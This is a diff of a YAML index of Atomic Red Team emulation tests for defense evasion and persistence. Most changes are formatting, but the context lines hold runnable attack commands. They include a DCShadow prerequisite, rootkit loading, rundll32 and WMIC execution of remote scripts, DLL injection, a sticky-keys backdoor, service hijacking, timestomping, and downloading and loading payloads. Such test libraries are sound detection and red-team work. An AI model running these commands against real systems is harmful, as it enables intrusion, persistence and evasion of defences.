@@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore - ' +' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: 
@@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} - ' +' cleanup_command: 'sudo rmmod #{rootkit_name} - ' +' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} - ' +' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. - ' +' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); - ' +' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb 
@@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) - ' +' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 
@@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. - ' +' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} - ' +' name: command_prompt T1134.005: technique: 
@@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: 
@@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} - ' +' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" - ' +' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB - ' +' supported_platforms: - windows input_arguments: 
@@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} - ' +' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} - ' +' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. - ' +' supported_platforms: - windows input_arguments: 
@@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided - ' +' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." - ' +' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." - ' +' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt - ' +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" - ' +' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
@@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - ' +' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. - ' +' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe - ' +' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename - ' +' supported_platforms: - macos executor: 
@@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. - ' +' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system 
@@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} - ' +' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} - ' +' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 
@@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 
@@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" - ' +' - description: 'kxwn.lock must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File - ' +' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) - ' +' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r - ' +' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 
@@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s - ' +' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 - ' +' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) - ' +' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 - ' +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1220: 
@@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) - ' +' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) - ' +' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 
@@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. - ' +' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) - ' +' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" - ' +' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" - ' +' name: command_prompt persistence: T1546.008: 
@@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory - ' +' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False - ' +' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - ' +' supported_platforms: - iaas:aws input_arguments: 
@@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test - ' +' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" - ' +' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ 